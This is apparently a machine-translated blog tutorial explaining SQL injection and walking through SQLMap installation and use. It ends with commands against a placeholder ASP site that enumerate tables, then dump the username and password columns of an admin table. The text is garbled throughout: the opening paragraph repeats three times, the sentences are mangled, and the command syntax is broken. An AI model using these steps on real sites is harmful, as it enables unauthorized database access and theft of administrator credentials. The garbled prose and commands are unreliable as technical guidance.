What is SQL injection attacks? SQL injection attacks are one of the common means for hackers to attack databases. With the development of BS-based applications, more and more programmers are writing applications using this mode. However, due to the varying levels of programmers and experience, a considerable number of programmers did not input user data when writing code.
What is SQL injection attacks? SQL injection attacks are one of the common means for hackers to attack databases. With the development of B/S application development, more and more programmers are writing applications using this mode. However, due to the varying levels of programmers and experience, a considerable number of programmers did not input user data when writing code.
What is SQLInjectionAttack?
SQLInjectionAttacks are one of the common means for hackers to attack databases. With the development of B/S application development, programmers who use this mode to write applications
More and more. However, due to the varying levels of programmers and experience, a considerable number of programmers did not integrate user input data when writing code.
Legal judgment, so that the application has security risks. You can submit a piece of database query code and obtain the desired information based on the results returned by the program.
Data, which is the so-called SQL Injection, that is, SQLInjection.
What isSQLMap?
SqlMapIs an open source penetration testing tool that can automatically detect and use SQLInjectionVulnerabilities and the process of taking over database servers. It passes a strong
The big detection engine, final penetration testing, and extensive persistent toggle from the database fingerprint, extracts data from the database, accesses the underlying file system and operations
Many niche functions of the system for command execution are out-of-band connections.
Project website: http ://Sqlmap.Sourceforge.net/
Supported databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, MicrosoftAccess, SQLite, Firebird, Sybase and SAP MaxDB
See it. It covers almost all the databases on the market.
Download: http://downloads.sourceforge.net/Sqlmap/Sqlmap-0.9.tar.gz latest 0.9
Install
SqlmapWrite in Python and decompress the package.
Tar zxvfSqlmap-0.9.tar.gz
CdSqlmap-0.9/
Run
PythonSqlmap. Py
Or
Chmod + xSqlmap. Py
./Sqlmap. Py
Help
PythonSqlmap. Py-h
Many options
If you cannot see any child shoes, you can move them here first.
There are almost only a few examples on the Internet, such as help and explanation. I hope everyone will speak enthusiastically and study them together.
ForAccessIn general, databases can only burst tables and data (to avoid unnecessary troubles, URLs are replaced by www.xxx.com, you know)
./Sqlmap. Py-u "http://www.xxx.com.cn/shownews.asp? Id = 67 "-- table-u" you wantInjectionURL "-- table burst table
There will be a question mark in the middle for you to enter the thread. You can enter a number 5 =.
It will start to run the table.
When we run these tables, the smart kids shoes will know that the table will have what we want.
The column name of the specified table is exploding below, and adminuser is exploding here.
./Sqlmap. Py-u "http://www.xxx.com.cn/shownews.asp? Id = 67 "-- columns-T amdinuser
You can use Ctrl + C to stop or wait.
Data explosion
./Sqlmap. Py-u "http://www.xxx.com.cn/shownews.asp? Id = 67 "-- dump-T adminuser-C username, password
The result will be displayed soon.